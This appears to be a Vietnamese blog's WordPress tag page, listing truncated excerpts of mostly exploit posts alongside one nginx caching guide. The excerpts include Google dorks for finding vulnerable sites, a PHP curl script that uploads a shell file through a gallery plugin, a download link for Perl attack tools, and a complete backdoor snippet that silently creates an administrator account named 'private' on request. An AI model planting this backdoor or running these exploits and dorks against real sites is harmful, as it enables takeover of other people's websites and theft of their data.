################################################## #################################################
# Exploit Title: WordPress Curvo Themes CSRF File Upload Vulnerability
# Author: Byakuya
# Date: 10/26/2013
# Vendor Homepage: http://themeforest.net/
# Themes Link: http://www.wphub.com/themes/curvo-by-themeforest/
# Infected File: upload_handler.php
# Google dork: inurl:/wp-content/themes/curvo/
##################################################...
Hiển thị các bài đăng có nhãn WordPress. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn WordPress. Hiển thị tất cả bài đăng
Wordpress WP Realty Plugin - Blind SQL Injection
$$$$$$\ $$\ $$\ $$$$$$\
$$ __$$\ $$ | $$ | $$ __$$\
$$ / \__| $$ | $$ | $$ / \__|
$$ |$$$$\ $$$$$$$$ | \$$$$$$\
$$ |\_$$ | $$ __$$ | \____$$\
$$ | $$ | $$ | $$ | $$\ $$ |
\$$$$$$ |$$\ $$ | $$ |$$\\$$$$$$ |
\______/ \__|\__| \__|\__|\______/
# Exploit Title: Wordpress - wp-realty - MySQL Time Based Injection
# Google Dork: inurl:"/wp-content/plugins/wp-realty/"
#...
Xem Thêm
Wordpress Plugin Complete Gallery Manager 3.3.3 - Arbitrary File Upload Vulnerability
Exploit :
Code:
<?php
$uploadfile="up.php";
$ch = curl_init("http://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print...
Xem Thêm
Cấu hình Wordpress + WP Super Cache + Cloudflare trên nginx
Mở file vhost của tên miền lên, chúng ta sẽ thấy có đoạn
Code:
index index.php index.html index.htm;
server_name abc.com;
location / {
try_files $uri $uri/ /index.php?$args;
}
Sửa nó thành như sau
Code:
index index.php index.html index.htm;
server_name abc.com cdn.abc.com;
set $cache_uri...
Xem Thêm
WordPress plugin W3 Total Cache critical Vulnerability disclosed
One of the most popular Wordpress Plugin called "W3 Total Cache"
which is used to Improve site performance and user experience via
caching, having potential vulnerability. On Christmas day, someone
disclose it on full-disclosure site that how a plugin misconfiguration
leads to possible Wordpress cms hack.
The...
Xem Thêm
Perl Attack Tools
Giới thiệu về tính năng các lựa chọn trong menu mình sẽ giới thiệu sau. Đây là demo của em nó!
***mình hi vọng tool được ủng hộ và phát triển ở Việt Nam. Mọi sự sao chép mong các bạn tôn trọng bản quyền của tác giả
Thanks to -->Persia Security Group<--
links: http://www.mediafire.com/?nq8o41fyfqtisah
pass: talentkong@ceh.vn
...
Xem Thêm
Cross-site Scripting Vulnerability in WordPress GD Star Rating Plugin
Vector:
Remote
Severity:
Low
Patch:
Unpatched
Impact:
Cross-site Scripting (XSS)
Software:
WordPress GD Star Rating Plugin 1.x , vulnerable versions: <=1.9.7
A cross-site scripting (XSS) vulnerability has been discovered in WordPress GD Star Rating Plugin.
An input validation error exists in
wp-content/plugins/gd-star-rating/widgets/widget_top.php...
Xem Thêm
WordPress Admin Access Backdoor
<?php
add_action('wp_head', 'my_backdoor');
function my_backdoor() {
If ($_GET['backdoor'] == 'go') {
require('wp-includes/registration.php');
If (!username_exists('private')) {
$user_id = wp_create_user('private', '12345678');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>...
Xem Thêm
WordPress Blog Exploit
search google: inurl:"fbconnect_action=myhome"
thay
?fbconnect_action=myhome&userid...
